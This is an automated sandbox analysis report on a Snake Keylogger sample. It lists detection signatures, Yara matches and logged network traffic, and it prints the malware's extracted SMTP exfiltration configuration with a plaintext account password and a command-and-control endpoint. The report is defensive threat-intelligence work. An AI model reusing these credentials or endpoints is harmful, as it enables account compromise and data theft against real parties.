Windows Analysis Report
PT98765445670009.scr.exe

Overview

General Information

Sample name: PT98765445670009.scr.exe
Analysis ID: 1416398
MD5: 90a34e7d570fa7c219eb5f1f193611ba
SHA1: 0d5d3955b04174b8f21c7bdd8d80ff21507e409c
SHA256: 301271b7db09d4769df8953807ea16c44578a4c4b92ef50f24da27c144f95522
Tags: exe, SnakeKeylogger

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PT98765445670009.scr.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\PT98765445670009.scr.exe" MD5: 90A34E7D570FA7C219EB5F1F193611BA)
    • PT98765445670009.scr.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\PT98765445670009.scr.exe" MD5: 90A34E7D570FA7C219EB5F1F193611BA)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
Source | Rule | Description | Author | Strings
00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x4ac6b:$x1: In$J$ct0r
00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14808:$a1: get_encryptedPassword
  • 0x14afe:$a2: get_encryptedUsername
  • 0x14614:$a3: get_timePasswordChanged
  • 0x1470f:$a4: get_passwordField
  • 0x1481e:$a5: set_encryptedPassword
  • 0x15e4a:$a7: get_logins
  • 0x15dad:$a10: KeyLoggerEventArgs
  • 0x15a46:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x18104:$x1: $%SMTPDV$
  • 0x18168:$x2: $#TheHashHere%&
  • 0x197eb:$x3: %FTPDV$
  • 0x198df:$x4: $%TelegramDv$
  • 0x15a46:$x5: KeyLoggerEventArgs
  • 0x15dad:$x5: KeyLoggerEventArgs
  • 0x1980f:$m2: Clipboard Logs ID
  • 0x199db:$m2: Screenshot Logs ID
  • 0x19aa7:$m2: keystroke Logs ID
  • 0x199b3:$m4: \SnakeKeylogger\

Source | Rule | Description | Author | Strings
1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x4ac6b:$x1: In$J$ct0r
1.2.PT98765445670009.scr.exe.3f93da0.4.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x48e6b:$x1: In$J$ct0r
1.2.PT98765445670009.scr.exe.3fe25d0.2.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x48e6b:$x1: In$J$ct0r
1.2.PT98765445670009.scr.exe.5500000.6.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x48e6b:$x1: In$J$ct0r
1.2.PT98765445670009.scr.exe.4096c60.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

No Sigma rule has matched
No Snort rule has matched

        AV Detection

        Source: PT98765445670009.scr.exe | Avira: detected
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
        Source: scratchdreams.tk | Virustotal: Detection: 6%
        Source: http://scratchdreams.tk | Virustotal: Detection: 6%
        Source: https://scratchdreams.tk | Virustotal: Detection: 13%
        Source: PT98765445670009.scr.exe | ReversingLabs: Detection: 50%
        Source: PT98765445670009.scr.exe | Virustotal: Detection: 59%
        Source: PT98765445670009.scr.exe | Joe Sandbox ML: detected
        Source: PT98765445670009.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49700 version: TLS 1.0
        Source: unknown | HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.7:49714 version: TLS 1.2
        Source: PT98765445670009.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp

        Networking

        Source: Yara match | File source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: global traffic | HTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /xml/102.165.48.43 HTTP/1.1 Host: reallyfreegeoip.org
        Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 193.122.6.168
        Source: Joe Sandbox View | IP Address: 172.67.177.134
        Source: Joe Sandbox View | IP Address: 104.21.27.85
        Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | DNS query: name: checkip.dyndns.org
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
        Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49700 version: TLS 1.0
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | DNS traffic detected: queries for: checkip.dyndns.org
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://checkip.dyndns.com
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://checkip.dyndns.org
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://checkip.dyndns.org/
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://checkip.dyndns.org/q
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://crl.micro2G
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://reallyfreegeoip.org
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: PT98765445670009.scr.exe | String found in binary or memory: http://scratchdreams.tk
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://reallyfreegeoip.org
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/102.165.48.43
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/102.165.48.43$
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://scratchdreams.tk
        Source: PT98765445670009.scr.exe | String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknown | HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.7:49714 version: TLS 1.2

        System Summary

        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.2f53b10.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.2f512e8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects downloader injector | Author: ditekSHen
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess Stats: CPU usage > 49%
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1238457228.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameExample.dll0 vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000000.1224946273.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamePATVENT.exe( vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameExample.dll0 vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000002.00000002.3683545276.0000000000BB7000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, Binary or memory string: OriginalFilenamePATVENT.exe( vs PT98765445670009.scr.exe
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: version.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: version.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rasapi32.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rasman.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rtutils.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: secur32.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe, Section loaded: dpapi.dll
        Source: PT98765445670009.scr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
